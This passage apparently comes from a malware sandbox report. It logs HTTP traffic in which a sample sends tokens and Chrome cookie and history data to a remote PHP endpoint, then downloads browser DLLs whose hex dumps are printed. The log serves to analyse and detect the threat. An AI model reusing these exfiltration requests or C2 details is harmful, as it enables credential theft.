                                                                                                    2024-05-03 09:21:30 UTC4599OUTData Raw: 2d 2d 2d 2d 2d 2d 43 41 41 41 41 46 42 4b 46 49 45 43 41 41 4b 45 43 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 37 65 31 61 62 62 34 37 33 30 61 30 63 33 62 31 66 34 32 63 63 61 62 36 37 64 37 61 32 61 65 30 36 31 64 64 66 32 34 37 34 38 37 62 33 39 35 65 32 33 32 37 32 38 35 39 33 31 64 37 64 31 30 38 30 64 34 33 30 36 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 41 41 46 42 4b 46 49 45 43 41 41 4b 45 43 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62
                                                                                                    Data Ascii: ------CAAAAFBKFIECAAKECGCAContent-Disposition: form-data; name="token"877e1abb4730a0c3b1f42ccab67d7a2ae061ddf247487b395e2327285931d7d1080d4306------CAAAAFBKFIECAAKECGCAContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb
                                                                                                    2024-05-03 09:21:30 UTC181INHTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:30 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 0
                                                                                                    Connection: close
                                                                                                    X-Served-By: shaffatta.com


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    6192.168.2.449743168.119.248.464436936C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-05-03 09:21:31 UTC201OUTPOST /fdca69ae739b4897.php HTTP/1.1
                                                                                                    Content-Type: multipart/form-data; boundary=----IJDBKKJKJEBFBGCBAAFI
                                                                                                    Host: shaffatta.com
                                                                                                    Content-Length: 1451
                                                                                                    Connection: Keep-Alive
                                                                                                    Cache-Control: no-cache
                                                                                                    2024-05-03 09:21:31 UTC1451OUTData Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 42 4b 4b 4a 4b 4a 45 42 46 42 47 43 42 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 37 65 31 61 62 62 34 37 33 30 61 30 63 33 62 31 66 34 32 63 63 61 62 36 37 64 37 61 32 61 65 30 36 31 64 64 66 32 34 37 34 38 37 62 33 39 35 65 32 33 32 37 32 38 35 39 33 31 64 37 64 31 30 38 30 64 34 33 30 36 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 42 4b 4b 4a 4b 4a 45 42 46 42 47 43 42 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 61 47 6c 7a 64 47 39 79 65 56 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62
                                                                                                    Data Ascii: ------IJDBKKJKJEBFBGCBAAFIContent-Disposition: form-data; name="token"877e1abb4730a0c3b1f42ccab67d7a2ae061ddf247487b395e2327285931d7d1080d4306------IJDBKKJKJEBFBGCBAAFIContent-Disposition: form-data; name="file_name"aGlzdG9yeVxHb29nbGUgQ2hyb
                                                                                                    2024-05-03 09:21:31 UTC181INHTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:31 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 0
                                                                                                    Connection: close
                                                                                                    X-Served-By: shaffatta.com


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    7192.168.2.449744168.119.248.464436936C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-05-03 09:21:32 UTC200OUTPOST /fdca69ae739b4897.php HTTP/1.1
                                                                                                    Content-Type: multipart/form-data; boundary=----DAAAFBKECAKEHIEBAFIE
                                                                                                    Host: shaffatta.com
                                                                                                    Content-Length: 359
                                                                                                    Connection: Keep-Alive
                                                                                                    Cache-Control: no-cache
                                                                                                    2024-05-03 09:21:32 UTC359OUTData Raw: 2d 2d 2d 2d 2d 2d 44 41 41 41 46 42 4b 45 43 41 4b 45 48 49 45 42 41 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 37 65 31 61 62 62 34 37 33 30 61 30 63 33 62 31 66 34 32 63 63 61 62 36 37 64 37 61 32 61 65 30 36 31 64 64 66 32 34 37 34 38 37 62 33 39 35 65 32 33 32 37 32 38 35 39 33 31 64 37 64 31 30 38 30 64 34 33 30 36 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 41 46 42 4b 45 43 41 4b 45 48 49 45 42 41 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d
                                                                                                    Data Ascii: ------DAAAFBKECAKEHIEBAFIEContent-Disposition: form-data; name="token"877e1abb4730a0c3b1f42ccab67d7a2ae061ddf247487b395e2327285931d7d1080d4306------DAAAFBKECAKEHIEBAFIEContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl---
                                                                                                    2024-05-03 09:21:32 UTC181INHTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:32 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 0
                                                                                                    Connection: close
                                                                                                    X-Served-By: shaffatta.com


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    8192.168.2.449745168.119.248.464436936C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-05-03 09:21:33 UTC200OUTPOST /fdca69ae739b4897.php HTTP/1.1
                                                                                                    Content-Type: multipart/form-data; boundary=----HIIIDAKKJJJKKECAKKJE
                                                                                                    Host: shaffatta.com
                                                                                                    Content-Length: 359
                                                                                                    Connection: Keep-Alive
                                                                                                    Cache-Control: no-cache
                                                                                                    2024-05-03 09:21:33 UTC359OUTData Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 37 65 31 61 62 62 34 37 33 30 61 30 63 33 62 31 66 34 32 63 63 61 62 36 37 64 37 61 32 61 65 30 36 31 64 64 66 32 34 37 34 38 37 62 33 39 35 65 32 33 32 37 32 38 35 39 33 31 64 37 64 31 30 38 30 64 34 33 30 36 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d
                                                                                                    Data Ascii: ------HIIIDAKKJJJKKECAKKJEContent-Disposition: form-data; name="token"877e1abb4730a0c3b1f42ccab67d7a2ae061ddf247487b395e2327285931d7d1080d4306------HIIIDAKKJJJKKECAKKJEContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl---
                                                                                                    2024-05-03 09:21:33 UTC181INHTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:33 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 0
                                                                                                    Connection: close
                                                                                                    X-Served-By: shaffatta.com


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    9192.168.2.449746168.119.248.464436936C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-05-03 09:21:34 UTC92OUTGET /d32e011d2eaa85a0/freebl3.dll HTTP/1.1
                                                                                                    Host: shaffatta.com
                                                                                                    Cache-Control: no-cache
                                                                                                    2024-05-03 09:21:34 UTC286INHTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:34 GMT
                                                                                                    Content-Type: application/x-msdos-program
                                                                                                    Content-Length: 685392
                                                                                                    Connection: close
                                                                                                    Last-Modified: Mon, 05 Sep 2022 08:49:08 GMT
                                                                                                    ETag: "a7550-5e7ea271b0900"
                                                                                                    Accept-Ranges: bytes
                                                                                                    X-Served-By: shaffatta.com
                                                                                                    2024-05-03 09:21:34 UTC16098INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00
                                                                                                    Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
                                                                                                    2024-05-03 09:21:34 UTC16384INData Raw: c8 89 d9 31 d1 89 c3 0f a4 cb 08 0f a4 c1 08 89 4d 8c 8b 45 b4 03 85 0c ff ff ff 13 bd 10 ff ff ff 01 c8 89 45 b4 11 df 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11
                                                                                                    Data Ascii: 1MEE}1M1XM}}UU1M1UM] EH]EE|1E1EMMuuU1M1Mu]uM11U|uuM
                                                                                                    2024-05-03 09:21:34 UTC16384INData Raw: dc d1 c2 31 d1 c1 c1 08 31 ce 89 b0 94 00 00 00 8b 55 cc 8b 75 90 31 f2 c1 c2 08 89 88 90 00 00 00 31 d6 89 b0 9c 00 00 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90
                                                                                                    Data Ascii: 11Uu11M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwj
                                                                                                    2024-05-03 09:21:34 UTC16384INData Raw: 8d 47 08 89 45 dc 89 d6 89 cf ff 15 00 80 0a 10 56 53 ff 75 dc ff d1 8b 7d 08 83 c4 0c 8a 87 18 01 00 00 30 03 8a 87 19 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10
                                                                                                    Data Ascii: GEVSu}00C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M0
                                                                                                    2024-05-03 09:21:34 UTC16384INData Raw: 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 f0 33 0c b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 8e 70 3b 08 10 8b 75 e0 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1
                                                                                                    Data Ascii: p73p33p;u^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;
                                                                                                    2024-05-03 09:21:35 UTC16384INData Raw: 89 45 ac 89 38 c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 8d 45 e0 50 e8 04 5a 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00
                                                                                                    Data Ascii: E8EEEEEPZ}EPYEPYEPYFMPQW|EppEPH[FMPQuo=EppEPN@
                                                                                                    2024-05-03 09:21:35 UTC16384INData Raw: 00 00 00 50 e8 75 1c 04 00 83 c4 04 8d 44 24 10 50 e8 68 1c 04 00 83 c4 04 8d 44 24 70 50 e8 5b 1c 04 00 83 c4 04 8d 44 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc
                                                                                                    Data Ascii: PuD$PhD$pP[D$`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEE
                                                                                                    2024-05-03 09:21:35 UTC16384INData Raw: ff 89 85 ac fe ff ff 89 d8 f7 e6 89 95 c0 fe ff ff 89 85 c8 fe ff ff 8b 7d 88 89 f8 f7 65 c8 89 55 84 89 85 0c fd ff ff 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff
                                                                                                    Data Ascii: }eUeLXee0@eeeue0UEeeUee
                                                                                                    2024-05-03 09:21:35 UTC16384INData Raw: f6 eb 16 8b 45 b0 8b 78 0c 31 c0 eb 09 8b 45 b0 8b 78 0c 8b 47 3c 8b 77 38 8b 4f 34 89 4d e4 8b 4f 30 89 4d d4 8b 4f 2c 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b
                                                                                                    Data Ascii: Ex1ExG<w8O4MO0MO,MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EE
                                                                                                    2024-05-03 09:21:35 UTC16384INData Raw: ff ff ff 8b 95 28 ff ff ff 89 d6 81 e2 ff ff ff 03 8d 14 d0 89 c8 c1 e8 1c c1 ee 1a 01 c2 89 95 08 ff ff ff 8b bd 2c ff ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff
                                                                                                    Data Ascii: (,0<48%8A)$


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    10192.168.2.449747168.119.248.464436936C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-05-03 09:21:35 UTC92OUTGET /d32e011d2eaa85a0/mozglue.dll HTTP/1.1
                                                                                                    Host: shaffatta.com
                                                                                                    Cache-Control: no-cache
                                                                                                    2024-05-03 09:21:36 UTC286INHTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:36 GMT
                                                                                                    Content-Type: application/x-msdos-program
                                                                                                    Content-Length: 608080
                                                                                                    Connection: close
                                                                                                    Last-Modified: Mon, 05 Sep 2022 08:49:08 GMT
                                                                                                    ETag: "94750-5e7ea271b0900"
                                                                                                    Accept-Ranges: bytes
                                                                                                    X-Served-By: shaffatta.com
                                                                                                    2024-05-03 09:21:36 UTC16098INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00
                                                                                                    Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
                                                                                                    2024-05-03 09:21:36 UTC16384INData Raw: 78 07 00 83 c4 0c 8b 45 ec e9 aa fe ff ff 8d 41 24 50 e8 17 7f 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 31 ff ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00
                                                                                                    Data Ascii: xEA$P#H1A$P~#HbA$P~#HUVuF|FlNhFd
                                                                                                    2024-05-03 09:21:36 UTC16384INData Raw: f9 ff ef ff ff 0f 86 c2 05 00 00 50 e8 9d d3 01 00 83 c4 04 e9 e6 f9 ff ff 8b 45 a8 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5
                                                                                                    Data Ascii: PEPzEPWxP1`PHP$,FM1R'^_[]
